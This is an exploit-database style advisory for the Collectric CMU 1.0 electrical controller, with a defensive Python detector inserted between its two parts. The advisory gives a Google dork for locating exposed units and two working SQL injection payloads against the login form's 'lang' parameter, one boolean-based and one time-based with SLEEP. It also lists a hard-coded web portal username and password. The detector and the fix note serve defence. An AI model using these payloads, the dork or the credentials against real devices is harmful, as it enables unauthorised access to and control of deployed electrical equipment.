Exploits / Vulnerability Discovered : 2018-09-21
Type : webapps
Platform : hardware
This exploit / vulnerability (Collectric CMU 1.0 'lang' SQL injection / hard-coded credentials) is for educational purposes only; if it is used, you do so at your own risk!
# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection
# Google Dork: "Inloggning Collectric CMU"
# Discoverer: Simon Brannstrom
# Date: 2018-09-15
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# CVE: N/A
# About: Collectric CMU is a Swedish-made controller device for electrical devices such as car heaters,
# camping sites etc., powered by an NGW board running Linux 2.6.30 with a PHP admin interface.
# More vulnerabilities exist; see my other vulnerability reports.
# Parameter: lang (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in
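
A defender-side check for the `lang` injection reported above, added here as an example and not part of the original advisory or the vendor's code: it validates the login form's `lang` value against an allow-list pattern and notes slow replies on anomalous requests. The `LANG_OK` pattern, the `SLOW_SECONDS` threshold, the `ENGLISH` value, the function names and the sample records are assumptions.

```python
import re
from urllib.parse import parse_qs

# Assumption: a legitimate login form sends a short alphabetic language name
# (the advisory shows SWEDISH). Anything else in `lang` is treated as anomalous.
LANG_OK = re.compile(r"[A-Za-z]{2,20}")
SLOW_SECONDS = 4.0  # assumed threshold; time-based blind probes delay the reply

def check_body(body):
    """Return a list of reasons the login form body is suspicious."""
    params = parse_qs(body, keep_blank_values=True)  # also URL-decodes values
    langs = params.get("lang", [])
    reasons = []
    if len(langs) > 1:
        reasons.append("lang repeated")
    for value in langs:
        if not LANG_OK.fullmatch(value):
            reasons.append("lang not a plain language name: %r" % value)
    return reasons

def scan(records):
    """records: (client, form_body, response_seconds). Returns alerts per client."""
    alerts = {}
    for client, body, seconds in records:
        reasons = check_body(body)
        if not reasons:
            continue  # a slow reply alone is not flagged, only with a bad lang
        if seconds >= SLOW_SECONDS:
            reasons.append("slow reply (%.1fs) on anomalous lang" % seconds)
        alerts.setdefault(client, []).extend(reasons)
    return alerts

# Constructed sample records; client addresses are documentation ranges.
# The two anomalous bodies reuse the lang values quoted in the advisory.
SAMPLE = [
    ("192.0.2.10", "username=anna&lang=SWEDISH&password=x&submit=Logga in", 0.2),
    ("192.0.2.10", "username=anna&lang=ENGLISH&password=x&submit=Logga in", 6.1),
    ("198.51.100.7", "username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY", 0.3),
    ("198.51.100.7", "username=yUqg&lang=SWEDISH%27 AND SLEEP(5) AND %27kglV%27=%27kglV&password=zhdY", 5.2),
]

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE).items():
        print(client, len(reasons), "finding(s)")
        for r in reasons:
            print("   ", r)
```

The same allow-list test, applied server-side before the value reaches any query, is also the input-validation half of the fix; the other half is a parameterized query.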
# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.
# Discoverer: Simon Brannstrom
# Date: 09/15/2018
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: Collectric CMU is a Swedish-made controller device for electrical devices such as car heaters, camping sites etc., powered by an NGW board running Linux 2.6.30 with a PHP admin interface.
# More vulnerabilities exist; see my other vulnerability reports.
---
Web Portal hard-coded credentials:
username: sysadmin
password: zoogin